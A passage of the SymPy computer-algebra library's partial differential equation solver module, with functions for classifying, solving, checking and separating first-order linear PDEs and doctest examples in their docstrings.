with constant coefficients.
- 1st order linear partial differential equations with
variable coefficients.
"""
from __future__ import print_function, division
from itertools import combinations_with_replacement
from sympy.simplify import simplify
from sympy.core import Add, S
from sympy.core.compatibility import (reduce, is_sequence, range)
from sympy.core.function import Function, expand, AppliedUndef, Subs
from sympy.core.relational import Equality, Eq
from sympy.core.symbol import Symbol, Wild, symbols
from sympy.functions import exp
from sympy.integrals.integrals import Integral
from sympy.utilities.iterables import has_dups
from sympy.utilities.misc import filldedent
from sympy.solvers.deutils import _preprocess, ode_order, _desolve
from sympy.solvers.solvers import solve
from sympy.simplify.radsimp import collect
import operator
allhints = (
"1st_linear_constant_coeff_homogeneous",
"1st_linear_constant_coeff",
"1st_linear_constant_coeff_Integral",
"1st_linear_variable_coeff"
)
def pdsolve(eq, func=None, hint='default', dict=False, solvefun=None, **kwargs):
"""
Solves any (supported) kind of partial differential equation.
**Usage**
pdsolve(eq, f(x,y), hint) -> Solve partial differential equation
eq for function f(x,y), using method hint.
**Details**
``eq`` can be any supported partial differential equation (see
the pde docstring for supported methods). This can either
be an Equality, or an expression, which is assumed to be
equal to 0.
``f(x,y)`` is a function of two variables whose derivatives in that
variable make up the partial differential equation. In many
cases it is not necessary to provide this; it will be autodetected
(and an error raised if it couldn't be detected).
``hint`` is the solving method that you want pdsolve to use. Use
classify_pde(eq, f(x,y)) to get all of the possible hints for
a PDE. The default hint, 'default', will use whatever hint
is returned first by classify_pde(). See Hints below for
more options that you can use for hint.
``solvefun`` is the convention used for arbitrary functions returned
by the PDE solver. If not set by the user, it is set by default
to be F.
**Hints**
Aside from the various solving methods, there are also some
meta-hints that you can pass to pdsolve():
"default":
This uses whatever hint is returned first by
classify_pde(). This is the default argument to
pdsolve().
"all":
To make pdsolve apply all relevant classification hints,
use pdsolve(PDE, func, hint="all"). This will return a
dictionary of hint:solution terms. If a hint causes
pdsolve to raise the NotImplementedError, value of that
hint's key will be the exception object raised. The
dictionary will also include some special keys:
- order: The order of the PDE. See also ode_order() in
deutils.py
- default: The solution that would be returned by
default. This is the one produced by the hint that
appears first in the tuple returned by classify_pde().
"all_Integral":
This is the same as "all", except if a hint also has a
corresponding "_Integral" hint, it only returns the
"_Integral" hint. This is useful if "all" causes
pdsolve() to hang because of a difficult or impossible
integral. This meta-hint will also be much faster than
"all", because integrate() is an expensive routine.
See also the classify_pde() docstring for more info on hints,
and the pde docstring for a list of all supported hints.
**Tips**
- You can declare the derivative of an unknown function this way:
>>> from sympy import Function, Derivative
>>> from sympy.abc import x, y # x and y are the independent variables
>>> f = Function("f")(x, y) # f is a function of x and y
>>> # fx will be the partial derivative of f with respect to x
>>> fx = Derivative(f, x)
>>> # fy will be the partial derivative of f with respect to y
>>> fy = Derivative(f, y)
- See test_pde.py for many tests, which serves also as a set of
examples for how to use pdsolve().
- pdsolve always returns an Equality class (except for the case
when the hint is "all" or "all_Integral"). Note that it is not possible
to get an explicit solution for f(x, y) as in the case of ODE's
- Do help(pde.pde_hintname) to get help more information on a
specific hint
Examples
========
>>> from sympy.solvers.pde import pdsolve
>>> from sympy import Function, diff, Eq
>>> from sympy.abc import x, y
>>> f = Function('f')
>>> u = f(x, y)
>>> ux = u.diff(x)
>>> uy = u.diff(y)
>>> eq = Eq(1 + (2*(ux/u)) + (3*(uy/u)))
>>> pdsolve(eq)
Eq(f(x, y), F(3*x - 2*y)*exp(-2*x/13 - 3*y/13))
"""
given_hint = hint # hint given by the user.
if not solvefun:
solvefun = Function('F')
# See the docstring of _desolve for more details.
hints = _desolve(eq, func=func,
hint=hint, simplify=True, type='pde', **kwargs)
eq = hints.pop('eq', False)
all_ = hints.pop('all', False)
if all_:
# TODO : 'best' hint should be implemented when adequate
# number of hints are added.
pdedict = {}
failed_hints = {}
gethints = classify_pde(eq, dict=True)
pdedict.update({'order': gethints['order'],
'default': gethints['default']})
for hint in hints:
try:
rv = _helper_simplify(eq, hint, hints[hint]['func'],
hints[hint]['order'], hints[hint][hint], solvefun)
except NotImplementedError as detail:
failed_hints[hint] = detail
else:
pdedict[hint] = rv
pdedict.update(failed_hints)
return pdedict
else:
return _helper_simplify(eq, hints['hint'],
hints['func'], hints['order'], hints[hints['hint']], solvefun)
def _helper_simplify(eq, hint, func, order, match, solvefun):
"""Helper function of pdsolve that calls the respective
pde functions to solve for the partial differential
equations. This minimizes the computation in
calling _desolve multiple times.
"""
if hint.endswith("_Integral"):
solvefunc = globals()[
"pde_" + hint[:-len("_Integral")]]
else:
solvefunc = globals()["pde_" + hint]
return _handle_Integral(solvefunc(eq, func, order,
match, solvefun), func, order, hint)
def _handle_Integral(expr, func, order, hint):
r"""
Converts a solution with integrals in it into an actual solution.
Simplifies the integral mainly using doit()
"""
if hint.endswith("_Integral"):
return expr
elif hint == "1st_linear_constant_coeff":
return simplify(expr.doit())
else:
return expr
def classify_pde(eq, func=None, dict=False, **kwargs):
"""
Returns a tuple of possible pdsolve() classifications for a PDE.
The tuple is ordered so that first item is the classification that
pdsolve() uses to solve the PDE by default. In general,
classifications near the beginning of the list will produce
better solutions faster than those near the end, though there are
always exceptions. To make pdsolve use a different classification,
use pdsolve(PDE, func, hint=<classification>). See also the pdsolve()
docstring for different meta-hints you can use.
If ``dict`` is true, classify_pde() will return a dictionary of
hint:match expression terms. This is intended for internal use by
pdsolve(). Note that because dictionaries are ordered arbitrarily,
this will most likely not be in the same order as the tuple.
You can get help on different hints by doing help(pde.pde_hintname),
where hintname is the name of the hint without "_Integral".
See sympy.pde.allhints or the sympy.pde docstring for a list of all
supported hints that can be returned from classify_pde.
Examples
========
>>> from sympy.solvers.pde import classify_pde
>>> from sympy import Function, diff, Eq
>>> from sympy.abc import x, y
>>> f = Function('f')
>>> u = f(x, y)
>>> ux = u.diff(x)
>>> uy = u.diff(y)
>>> eq = Eq(1 + (2*(ux/u)) + (3*(uy/u)))
>>> classify_pde(eq)
('1st_linear_constant_coeff_homogeneous',)
"""
prep = kwargs.pop('prep', True)
if func and len(func.args) != 2:
raise NotImplementedError("Right now only partial "
"differential equations of two variables are supported")
if prep or func is None:
prep, func_ = _preprocess(eq, func)
if func is None:
func = func_
if isinstance(eq, Equality):
if eq.rhs != 0:
return classify_pde(eq.lhs - eq.rhs, func)
eq = eq.lhs
f = func.func
x = func.args[0]
y = func.args[1]
fx = f(x,y).diff(x)
fy = f(x,y).diff(y)
# TODO : For now pde.py uses support offered by the ode_order function
# to find the order with respect to a multi-variable function. An
# improvement could be to classify the order of the PDE on the basis of
# individual variables.
order = ode_order(eq, f(x,y))
# hint:matchdict or hint:(tuple of matchdicts)
# Also will contain "default":<default hint> and "order":order items.
matching_hints = {'order': order}
if not order:
if dict:
matching_hints["default"] = None
return matching_hints
else:
return ()
eq = expand(eq)
a = Wild('a', exclude = [f(x,y)])
b = Wild('b', exclude = [f(x,y), fx, fy, x, y])
c = Wild('c', exclude = [f(x,y), fx, fy, x, y])
d = Wild('d', exclude = [f(x,y), fx, fy, x, y])
e = Wild('e', exclude = [f(x,y), fx, fy])
n = Wild('n', exclude = [x, y])
# Try removing the smallest power of f(x,y)
# from the highest partial derivatives of f(x,y)
reduced_eq = None
if eq.is_Add:
var = set(combinations_with_replacement((x,y), order))
dummyvar = var.copy()
power = None
for i in var:
coeff = eq.coeff(f(x,y).diff(*i))
if coeff != 1:
match = coeff.match(a*f(x,y)**n)
if match and match[a]:
power = match[n]
dummyvar.remove(i)
break
dummyvar.remove(i)
for i in dummyvar:
coeff = eq.coeff(f(x,y).diff(*i))
if coeff != 1:
match = coeff.match(a*f(x,y)**n)
if match and match[a] and match[n] < power:
power = match[n]
if power:
den = f(x,y)**power
reduced_eq = Add(*[arg/den for arg in eq.args])
if not reduced_eq:
reduced_eq = eq
if order == 1:
reduced_eq = collect(reduced_eq, f(x, y))
r = reduced_eq.match(b*fx + c*fy + d*f(x,y) + e)
if r:
if not r[e]:
## Linear first-order homogeneous partial-differential
## equation with constant coefficients
r.update({'b': b, 'c': c, 'd': d})
matching_hints["1st_linear_constant_coeff_homogeneous"] = r
else:
if r[b]**2 + r[c]**2 != 0:
## Linear first-order general partial-differential
## equation with constant coefficients
r.update({'b': b, 'c': c, 'd': d, 'e': e})
matching_hints["1st_linear_constant_coeff"] = r
matching_hints[
"1st_linear_constant_coeff_Integral"] = r
else:
b = Wild('b', exclude=[f(x, y), fx, fy])
c = Wild('c', exclude=[f(x, y), fx, fy])
d = Wild('d', exclude=[f(x, y), fx, fy])
r = reduced_eq.match(b*fx + c*fy + d*f(x,y) + e)
if r:
r.update({'b': b, 'c': c, 'd': d, 'e': e})
matching_hints["1st_linear_variable_coeff"] = r
# Order keys based on allhints.
retlist = []
for i in allhints:
if i in matching_hints:
retlist.append(i)
if dict:
# Dictionaries are ordered arbitrarily, so make note of which
# hint would come first for pdsolve(). Use an ordered dict in Py 3.
matching_hints["default"] = None
matching_hints["ordered_hints"] = tuple(retlist)
for i in allhints:
if i in matching_hints:
matching_hints["default"] = i
break
return matching_hints
else:
return tuple(retlist)
def checkpdesol(pde, sol, func=None, solve_for_func=True):
"""
Checks if the given solution satisfies the partial differential
equation.
pde is the partial differential equation which can be given in the
form of an equation or an expression. sol is the solution for which
the pde is to be checked. This can also be given in an equation or
an expression form. If the function is not provided, the helper
function _preprocess from deutils is used to identify the function.
If a sequence of solutions is passed, the same sort of container will be
used to return the result for each solution.
The following methods are currently being implemented to check if the
solution satisfies the PDE:
1. Directly substitute the solution in the PDE and check. If the
solution hasn't been solved for f, then it will solve for f
provided solve_for_func hasn't been set to False.
If the solution satisfies the PDE, then a tuple (True, 0) is returned.
Otherwise a tuple (False, expr) where expr is the value obtained
after substituting the solution in the PDE. However if a known solution
returns False, it may be due to the inability of doit() to simplify it to zero.
Examples
========
>>> from sympy import Function, symbols, diff
>>> from sympy.solvers.pde import checkpdesol, pdsolve
>>> x, y = symbols('x y')
>>> f = Function('f')
>>> eq = 2*f(x,y) + 3*f(x,y).diff(x) + 4*f(x,y).diff(y)
>>> sol = pdsolve(eq)
>>> assert checkpdesol(eq, sol)[0]
>>> eq = x*f(x,y) + f(x,y).diff(x)
>>> checkpdesol(eq, sol)
(False, (x*F(4*x - 3*y) - 6*F(4*x - 3*y)/25 + 4*Subs(Derivative(F(_xi_1), _xi_1), (_xi_1,), (4*x - 3*y,)))*exp(-6*x/25 - 8*y/25))
"""
# Converting the pde into an equation
if not isinstance(pde, Equality):
pde = Eq(pde, 0)
# If no function is given, try finding the function present.
if func is None:
try:
_, func = _preprocess(pde.lhs)
except ValueError:
funcs = [s.atoms(AppliedUndef) for s in (
sol if is_sequence(sol, set) else [sol])]
funcs = set().union(funcs)
if len(funcs) != 1:
raise ValueError(
'must pass func arg to checkpdesol for this case.')
func = funcs.pop()
# If the given solution is in the form of a list or a set
# then return a list or set of tuples.
if is_sequence(sol, set):
return type(sol)([checkpdesol(
pde, i, func=func,
solve_for_func=solve_for_func) for i in sol])
# Convert solution into an equation
if not isinstance(sol, Equality):
sol = Eq(func, sol)
elif sol.rhs == func:
sol = sol.reversed
# Try solving for the function
solved = sol.lhs == func and not sol.rhs.has(func)
if solve_for_func and not solved:
solved = solve(sol, func)
if solved:
if len(solved) == 1:
return checkpdesol(pde, Eq(func, solved[0]),
func=func, solve_for_func=False)
else:
return checkpdesol(pde, [Eq(func, t) for t in solved],
func=func, solve_for_func=False)
# try direct substitution of the solution into the PDE and simplify
if sol.lhs == func:
pde = pde.lhs - pde.rhs
s = simplify(pde.subs(func, sol.rhs).doit())
return s is S.Zero, s
raise NotImplementedError(filldedent('''
Unable to test if %s is a solution to %s.''' % (sol, pde)))
def pde_1st_linear_constant_coeff_homogeneous(eq, func, order, match, solvefun):
r"""
Solves a first order linear homogeneous
partial differential equation with constant coefficients.
The general form of this partial differential equation is
.. math:: a \frac{df(x,y)}{dx} + b \frac{df(x,y)}{dy} + c f(x,y) = 0
where `a`, `b` and `c` are constants.
The general solution is of the form::
>>> from sympy.solvers import pdsolve
>>> from sympy.abc import x, y, a, b, c
>>> from sympy import Function, pprint
>>> f = Function('f')
>>> u = f(x,y)
>>> ux = u.diff(x)
>>> uy = u.diff(y)
>>> genform = a*ux + b*uy + c*u
>>> pprint(genform)
d d
a*--(f(x, y)) + b*--(f(x, y)) + c*f(x, y)
dx dy
>>> pprint(pdsolve(genform))
-c*(a*x + b*y)
---------------
2 2
a + b
f(x, y) = F(-a*y + b*x)*e
Examples
========
>>> from sympy.solvers.pde import (
... pde_1st_linear_constant_coeff_homogeneous)
>>> from sympy import pdsolve
>>> from sympy import Function, diff, pprint
>>> from sympy.abc import x,y
>>> f = Function('f')
>>> pdsolve(f(x,y) + f(x,y).diff(x) + f(x,y).diff(y))
Eq(f(x, y), F(x - y)*exp(-x/2 - y/2))
>>> pprint(pdsolve(f(x,y) + f(x,y).diff(x) + f(x,y).diff(y)))
x y
- - - -
2 2
f(x, y) = F(x - y)*e
References
==========
- Viktor Grigoryan, "Partial Differential Equations"
Math 124A - Fall 2010, pp.7
"""
# TODO : For now homogeneous first order linear PDE's having
# two variables are implemented. Once there is support for
# solving systems of ODE's, this can be extended to n variables.
f = func.func
x = func.args[0]
y = func.args[1]
b = match[match['b']]
c = match[match['c']]
d = match[match['d']]
return Eq(f(x,y), exp(-S(d)/(b**2 + c**2)*(b*x + c*y))*solvefun(c*x - b*y))
def pde_1st_linear_constant_coeff(eq, func, order, match, solvefun):
r"""
Solves a first order linear partial differential equation
with constant coefficients.
The general form of this partial differential equation is
.. math:: a \frac{df(x,y)}{dx} + b \frac{df(x,y)}{dy} + c f(x,y) = G(x,y)
where `a`, `b` and `c` are constants and `G(x, y)` can be an arbitrary
function in `x` and `y`.
The general solution of the PDE is::
>>> from sympy.solvers import pdsolve
>>> from sympy.abc import x, y, a, b, c
>>> from sympy import Function, pprint
>>> f = Function('f')
>>> G = Function('G')
>>> u = f(x,y)
>>> ux = u.diff(x)
>>> uy = u.diff(y)
>>> genform = a*u + b*ux + c*uy - G(x,y)
>>> pprint(genform)
d d
a*f(x, y) + b*--(f(x, y)) + c*--(f(x, y)) - G(x, y)
dx dy
>>> pprint(pdsolve(genform, hint='1st_linear_constant_coeff_Integral'))
// b*x + c*y \
|| / |
|| | |
|| | a*xi |
|| | ------- |
|| | 2 2 |
|| | /b*xi + c*eta -b*eta + c*xi\ b + c |
|| | G|------------, -------------|*e d(xi)|
|| | | 2 2 2 2 | |
|| | \ b + c b + c / |
|| | |
|| / |
|| |
f(x, y) = ||F(eta) + -------------------------------------------------------|*
|| 2 2 |
\\ b + c /
<BLANKLINE>
\|
||
||
||
||
||
||
||
||
-a*xi ||
-------||
2 2||
b + c ||
e ||
||
/|eta=-b*y + c*x, xi=b*x + c*y
Examples
========
>>> from sympy.solvers.pde import pdsolve
>>> from sympy import Function, diff, pprint, exp
>>> from sympy.abc import x,y
>>> f = Function('f')
>>> eq = -2*f(x,y).diff(x) + 4*f(x,y).diff(y) + 5*f(x,y) - exp(x + 3*y)
>>> pdsolve(eq)
Eq(f(x, y), (F(4*x + 2*y) + exp(x/2 + 4*y)/15)*exp(x/2 - y))
References
==========
- Viktor Grigoryan, "Partial Differential Equations"
Math 124A - Fall 2010, pp.7
"""
# TODO : For now homogeneous first order linear PDE's having
# two variables are implemented. Once there is support for
# solving systems of ODE's, this can be extended to n variables.
xi, eta = symbols("xi eta")
f = func.func
x = func.args[0]
y = func.args[1]
b = match[match['b']]
c = match[match['c']]
d = match[match['d']]
e = -match[match['e']]
expterm = exp(-S(d)/(b**2 + c**2)*xi)
functerm = solvefun(eta)
solvedict = solve((b*x + c*y - xi, c*x - b*y - eta), x, y)
# Integral should remain as it is in terms of xi,
# doit() should be done in _handle_Integral.
genterm = (1/S(b**2 + c**2))*Integral(
(1/expterm*e).subs(solvedict), (xi, b*x + c*y))
return Eq(f(x,y), Subs(expterm*(functerm + genterm),
(eta, xi), (c*x - b*y, b*x + c*y)))
def pde_1st_linear_variable_coeff(eq, func, order, match, solvefun):
r"""
Solves a first order linear partial differential equation
with variable coefficients. The general form of this partial differential equation is
.. math:: a(x, y) \frac{df(x, y)}{dx} + a(x, y) \frac{df(x, y)}{dy}
+ c(x, y) f(x, y) - G(x, y)
where `a(x, y)`, `b(x, y)`, `c(x, y)` and `G(x, y)` are arbitrary functions
in `x` and `y`. This PDE is converted into an ODE by making the following transformation.
1] `\xi` as `x`
2] `\eta` as the constant in the solution to the differential equation
`\frac{dy}{dx} = -\frac{b}{a}`
Making the following substitutions reduces it to the linear ODE
.. math:: a(\xi, \eta)\frac{du}{d\xi} + c(\xi, \eta)u - d(\xi, \eta) = 0
which can be solved using dsolve.
The general form of this PDE is::
>>> from sympy.solvers.pde import pdsolve
>>> from sympy.abc import x, y
>>> from sympy import Function, pprint
>>> a, b, c, G, f= [Function(i) for i in ['a', 'b', 'c', 'G', 'f']]
>>> u = f(x,y)
>>> ux = u.diff(x)
>>> uy = u.diff(y)
>>> genform = a(x, y)*u + b(x, y)*ux + c(x, y)*uy - G(x,y)
>>> pprint(genform)
d d
-G(x, y) + a(x, y)*f(x, y) + b(x, y)*--(f(x, y)) + c(x, y)*--(f(x, y))
dx dy
Examples
========
>>> from sympy.solvers.pde import pdsolve
>>> from sympy import Function, diff, pprint, exp
>>> from sympy.abc import x,y
>>> f = Function('f')
>>> eq = x*(u.diff(x)) - y*(u.diff(y)) + y**2*u - y**2
>>> pdsolve(eq)
Eq(f(x, y), F(x*y)*exp(y**2/2) + 1)
References
==========
- Viktor Grigoryan, "Partial Differential Equations"
Math 124A - Fall 2010, pp.7
"""
from sympy.integrals.integrals import integrate
from sympy.solvers.ode import dsolve
xi, eta = symbols("xi eta")
f = func.func
x = func.args[0]
y = func.args[1]
b = match[match['b']]
c = match[match['c']]
d = match[match['d']]
e = -match[match['e']]
if not d:
# To deal with cases like b*ux = e or c*uy = e
if not (b and c):
if c:
try:
tsol = integrate(e/c, y)
except NotImplementedError:
raise NotImplementedError("Unable to find a solution"
" due to inability of integrate")
else:
return Eq(f(x,y), solvefun(x) + tsol)
if b:
try:
tsol = integrate(e/b, x)
except NotImplementedError:
raise NotImplementedError("Unable to find a solution"
" due to inability of integrate")
else:
return Eq(f(x,y), solvefun(y) + tsol)
if not c:
# To deal with cases when c is 0, a simpler method is used.
# The PDE reduces to b*(u.diff(x)) + d*u = e, which is a linear ODE in x
plode = f(x).diff(x)*b + d*f(x) - e
sol = dsolve(plode, f(x))
syms = sol.free_symbols - plode.free_symbols - {x, y}
rhs = _simplify_variable_coeff(sol.rhs, syms, solvefun, y)
return Eq(f(x, y), rhs)
if not b:
# To deal with cases when b is 0, a simpler method is used.
# The PDE reduces to c*(u.diff(y)) + d*u = e, which is a linear ODE in y
plode = f(y).diff(y)*c + d*f(y) - e
sol = dsolve(plode, f(y))
syms = sol.free_symbols - plode.free_symbols - {x, y}
rhs = _simplify_variable_coeff(sol.rhs, syms, solvefun, x)
return Eq(f(x, y), rhs)
dummy = Function('d')
h = (c/b).subs(y, dummy(x))
sol = dsolve(dummy(x).diff(x) - h, dummy(x))
if isinstance(sol, list):
sol = sol[0]
solsym = sol.free_symbols - h.free_symbols - {x, y}
if len(solsym) == 1:
solsym = solsym.pop()
etat = (solve(sol, solsym)[0]).subs(dummy(x), y)
ysub = solve(eta - etat, y)[0]
deq = (b*(f(x).diff(x)) + d*f(x) - e).subs(y, ysub)
final = (dsolve(deq, f(x), hint='1st_linear')).rhs
if isinstance(final, list):
final = final[0]
finsyms = final.free_symbols - deq.free_symbols - {x, y}
rhs = _simplify_variable_coeff(final, finsyms, solvefun, etat)
return Eq(f(x, y), rhs)
else:
raise NotImplementedError("Cannot solve the partial differential equation due"
" to inability of constantsimp")
def _simplify_variable_coeff(sol, syms, func, funcarg):
r"""
Helper function to replace constants by functions in 1st_linear_variable_coeff
"""
eta = Symbol("eta")
if len(syms) == 1:
sym = syms.pop()
final = sol.subs(sym, func(funcarg))
else:
fname = func.__name__
for key, sym in enumerate(syms):
tempfun = Function(fname + str(key))
final = sol.subs(sym, func(funcarg))
return simplify(final.subs(eta, funcarg))
def pde_separate(eq, fun, sep, strategy='mul'):
"""Separate variables in partial differential equation either by additive
or multiplicative separation approach. It tries to rewrite an equation so
that one of the specified variables occurs on a different side of the
equation than the others.
:param eq: Partial differential equation
:param fun: Original function F(x, y, z)
:param sep: List of separated functions [X(x), u(y, z)]
:param strategy: Separation strategy. You can choose between additive
separation ('add') and multiplicative separation ('mul') which is
default.
Examples
========
>>> from sympy import E, Eq, Function, pde_separate, Derivative as D
>>> from sympy.abc import x, t
>>> u, X, T = map(Function, 'uXT')
>>> eq = Eq(D(u(x, t), x), E**(u(x, t))*D(u(x, t), t))
>>> pde_separate(eq, u(x, t), [X(x), T(t)], strategy='add')
[exp(-X(x))*Derivative(X(x), x), exp(T(t))*Derivative(T(t), t)]
>>> eq = Eq(D(u(x, t), x, 2), D(u(x, t), t, 2))
>>> pde_separate(eq, u(x, t), [X(x), T(t)], strategy='mul')
[Derivative(X(x), x, x)/X(x), Derivative(T(t), t, t)/T(t)]
See Also
========
pde_separate_add, pde_separate_mul
"""
do_add = False
if strategy == 'add':
do_add = True
elif strategy == 'mul':
do_add = False
else:
assert ValueError('Unknown strategy: %s' % strategy)
if isinstance(eq, Equality):
if eq.rhs != 0:
return pde_separate(Eq(eq.lhs - eq.rhs), fun, sep, strategy)
else:
return pde_separate(Eq(eq, 0), fun, sep, strategy)
if eq.rhs != 0:
raise ValueError("Value should be 0")
# Handle arguments
orig_args = list(fun.args)
subs_args = []
for s in sep:
for j in range(0, len(s.args)):
subs_args.append(s.args[j])
if do_add:
functions = reduce(operator.add, sep)
else:
functions = reduce(operator.mul, sep)
# Check whether variables match
if len(subs_args) != len(orig_args):
raise ValueError("Variable counts do not match")
# Check for duplicate arguments like [X(x), u(x, y)]
if has_dups(subs_args):
raise ValueError("Duplicate substitution arguments detected")
# Check whether the variables match
if set(orig_args) != set(subs_args):
raise ValueError("Arguments do not match")
# Substitute original function with separated...
result = eq.lhs.subs(fun, functions).doit()
# Divide by terms when doing multiplicative separation
if not do_add:
eq = 0
for i in result.args:
eq += i/functions
result = eq
svar = subs_args[0]
dvar = subs_args[1:]
return _separate(result, svar, dvar)
def pde_separate_add(eq, fun, sep):
"""
Helper function for searching additive separable solutions.
Consider an equation of two independent variables x, y and a dependent
variable w, we look for the product of two functions depending on different
arguments:
`w(x, y, z) = X(x) + y(y, z)`
Examples
========
>>> from sympy import E, Eq, Function, pde_separate_add, Derivative as D
>>> from sympy.abc import x, t
>>> u, X, T = map(Function, 'uXT')
>>> eq = Eq(D(u(x, t), x), E**(u(x, t))*D(u(x, t), t))
>>> pde_separate_add(eq, u(x, t), [X(x), T(t)])
[exp(-X(x))*Derivative(X(x), x), exp(T(t))*Derivative(T(t), t)]
"""
return pde_separate(eq, fun, sep, strategy='add')
def pde_separate_mul(eq, fun, sep):
"""
Helper function for searching multiplicative separable solutions.
Consider an equation of two independent variables x, y and a dependent
variable w, we look for the product of two functions depending on different
arguments:
`w(x, y, z) = X(x)*u(y, z)`
Examples
========
>>> from sympy import Function, Eq, pde_separate_mul, Derivative as D
>>> from sympy.abc import x, y
>>> u, X, Y = map(Function, 'uXY')
>>> eq = Eq(D(u(x, y), x, 2), D(u(x, y), y, 2))
>>> pde_separate_mul(eq, u(x, y), [X(x), Y(y)])
[Derivative(X(x), x, x)/X(x), Derivative(Y(y), y, y)/Y(y)]
"""
return pde_separate(eq, fun, sep, strategy='mul')
def _separate(eq, dep, others):
"""Separate expression into two parts based on dependencies of variables."""
# FIRST PASS
# Extract derivatives depending our separable variable...
terms = set()
for term in eq.args:
if term.is_Mul:
for i in term.args:
if i.is_Derivative and not i.has(*others):
terms.add(term)
continue
elif term.is_Derivative and not term.has(*others):
terms.add(term)
# Find the factor that we need to divide by
div = set()
for term in terms:
ext, sep = term.expand().as_independent(dep)
# Failed?
if sep.has(*others):
return None
div.add(ext)
# FIXME: Find lcm() of all the divisors and divide with it, instead of
# current hack :(
# https://github.com/sympy/sympy/issues/4597
if len(div) > 0:
final = 0
for term in eq.args:
eqn = 0
for i in div:
eqn += term / i
final += simplify(eqn)
eq = final
# SECOND PASS - separate the derivatives
div = set()
lhs = rhs = 0
for term in eq.args:
# Check, whether we have already term with independent variable...
if not term.has(*others):
lhs += term
continue
# ...otherwise, try to separate
temp, sep = term.expand().as_independent(dep)
# Failed?
if sep.has(*others):
return None
# Extract the divisors
div.add(sep)
rhs -= term.expand()
# Do the division
fulldiv = reduce(operator.add, div)
lhs = simplify(lhs/fulldiv).expand()
rhs = simplify(rhs/fulldiv).expand()
# ...and check whether we were successful :)
if lhs.has(*others) or rhs.has(dep):
return None
return [lhs, rhs]
| bsd-3-clause |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.